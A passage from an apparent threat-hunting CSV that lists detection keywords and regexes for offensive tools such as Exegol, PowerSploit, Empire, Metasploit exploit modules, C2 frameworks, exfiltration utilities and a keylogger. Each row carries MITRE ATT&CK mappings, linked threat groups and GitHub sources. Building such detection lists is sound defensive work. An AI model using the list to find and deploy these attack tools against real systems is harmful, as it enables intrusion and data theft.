TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43515" "*exegol-docker-build*",".{0,1000}exegol\-docker\-build.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black 
Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43516" "*ExegolExceptions.py*",".{0,1000}ExegolExceptions\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43517" "*Exegol-images-main*",".{0,1000}Exegol\-images\-main.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43518" "*ExegolManager.py*",".{0,1000}ExegolManager\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43519" "*ExegolProgress.py*",".{0,1000}ExegolProgress\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43520" "*ExegolPrompt.py*",".{0,1000}ExegolPrompt\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","43521" "*ExeStager.csproj*",".{0,1000}ExeStager\.csproj.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","43522" "*ExeToInjectInTo.*",".{0,1000}ExeToInjectInTo\..{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","43523" "*ExeToLaunch StringToBePutAsCmdline*",".{0,1000}ExeToLaunch\sStringToBePutAsCmdline.{0,1000}","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","0","N/A","N/A","N/A","10","3337","542","2025-03-12T19:59:23Z","2019-06-29T13:22:36Z","43524" "*ExetoText.ps1*",".{0,1000}ExetoText\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","43525" "*exfil -regex* -domain*-url * -filepath *",".{0,1000}exfil\s\-regex.{0,1000}\s\-domain.{0,1000}\-url\s.{0,1000}\s\-filepath\s.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","43526" "*ExfilDataToGitHub*",".{0,1000}ExfilDataToGitHub.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-ExfilDataToGitHub.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","43527" "*Exfil-EC266392-D6BC-4F7B-A4D1-410166D30B55.json*",".{0,1000}Exfil\-EC266392\-D6BC\-4F7B\-A4D1\-410166D30B55\.json.{0,1000}","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tool","https://github.com/mbrg/power-pwn","1","1","N/A","N/A","10","10","939","100","2025-03-20T08:54:43Z","2022-06-14T11:40:21Z","43528" 
"*Exfiltrate::exfilLogs()*",".{0,1000}Exfiltrate\:\:exfilLogs\(\).{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","43529" "*exfiltrate_via_post.exe*",".{0,1000}exfiltrate_via_post\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","43530" "*Exfiltration from DNS finished!*",".{0,1000}Exfiltration\sfrom\sDNS\sfinished!.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","43531" "*Exfiltration from HTTPS finished!*",".{0,1000}Exfiltration\sfrom\sHTTPS\sfinished!.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","43532" "*Exfiltration.tests.ps1*",".{0,1000}Exfiltration\.tests\.ps1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a 
collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","43533" "*existing_auto_target.rb*",".{0,1000}existing_auto_target\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43534" "*exit_nimbo*",".{0,1000}exit_nimbo.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","43535" "*EXOCET-AV-Evasion-master*",".{0,1000}EXOCET\-AV\-Evasion\-master.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","43536" "*exocet-shellcode-exec-redo.go*",".{0,1000}exocet\-shellcode\-exec\-redo\.go.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense 
Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","N/A","10","9","840","147","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z","43537" "*--expected Bad --expected-stop Welcome*",".{0,1000}\-\-expected\sBad\s\-\-expected\-stop\sWelcome.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Hakumarachi/Bropper","1","0","N/A","N/A","7","3","201","19","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z","43539" "*expl-bin*",".{0,1000}expl\-bin.{0,1000}","offensive_tool_keyword","expl-bin","some of my modified exploits and some scripts.","T1210.001 - T1201 - T1059","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/sailay1996/expl-bin","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","43540" "*explib2_ie11_exec_test_case.rb*",".{0,1000}explib2_ie11_exec_test_case\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43541" "*exploit --get-backdoor*",".{0,1000}exploit\s\-\-get\-backdoor.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","N/A","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","43542" "*exploit -j -z*","exploit\s\-j\s\-z","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","Black Basta","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","N/A","10","10","247","70","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z","43543" "*exploit*wordpress_add_admin*",".{0,1000}exploit.{0,1000}wordpress_add_admin.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","43544" "*exploit.bash*",".{0,1000}exploit\.bash.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","#linux","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43545" "*exploit.bat*",".{0,1000}exploit\.bat.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43546" "*exploit.bin*",".{0,1000}exploit\.bin.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43547" "*exploit.c*",".{0,1000}exploit\.c.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43548" "*exploit.com*",".{0,1000}exploit\.com.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43549" 
"*exploit.exe*",".{0,1000}exploit\.exe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43551" "*exploit.msi*",".{0,1000}exploit\.msi.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43552" "*exploit.pl*",".{0,1000}exploit\.pl.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43553" "*exploit.ps1*",".{0,1000}exploit\.ps1.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43554" "*exploit.py*",".{0,1000}exploit\.py.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43555" "*exploit.reg*",".{0,1000}exploit\.reg.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43556" 
"*exploit.run*",".{0,1000}exploit\.run.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43557" "*exploit.sh*",".{0,1000}exploit\.sh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43558" "*exploit.vb*",".{0,1000}exploit\.vb.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43559" "*exploit.vbe*",".{0,1000}exploit\.vbe.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43560" "*exploit.vbs*",".{0,1000}exploit\.vbs.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1543 - T1588 - T1211 - T1203","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","1","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43561" "*exploit.vbscript*",".{0,1000}exploit\.vbscript.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43562" "*exploit.zsh*",".{0,1000}exploit\.zsh.{0,1000}","offensive_tool_keyword","POC","CVE POCs exploits executables ","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/lcashdol/Exploits","1","0","N/A","N/A","N/A","3","210","69","2020-07-14T15:41:00Z","2015-02-16T20:06:37Z","43563" "*exploit/windows/smb/ms08_067_netapi*",".{0,1000}exploit\/windows\/smb\/ms08_067_netapi.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43564" "*exploit/windows/smb/ms17_010_eternalblue*",".{0,1000}exploit\/windows\/smb\/ms17_010_eternalblue.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43565" 
"*exploit/windows/smb/ms17_010_psexec*",".{0,1000}exploit\/windows\/smb\/ms17_010_psexec.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","43566" "*exploit_frameworks.py*",".{0,1000}exploit_frameworks\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","43570" "*exploit_fuse.c*",".{0,1000}exploit_fuse\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","N/A","4","369","56","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z","43571" "*exploit_kctf.c*",".{0,1000}exploit_kctf\.c.{0,1000}","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","N/A","4","369","56","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z","43572" 
"*exploit_oneline.md*",".{0,1000}exploit_oneline\.md.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/drgreenthumb93/CVE-2022-30190-follina","1","1","N/A","N/A","N/A","1","8","4","2023-04-20T20:34:05Z","2022-06-01T11:37:08Z","43573" "*exploit_suggester *",".{0,1000}exploit_suggester\s\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","43574" "*exploit_suggester.*",".{0,1000}exploit_suggester\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","43575" "*exploit_suggester.py*",".{0,1000}exploit_suggester\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - 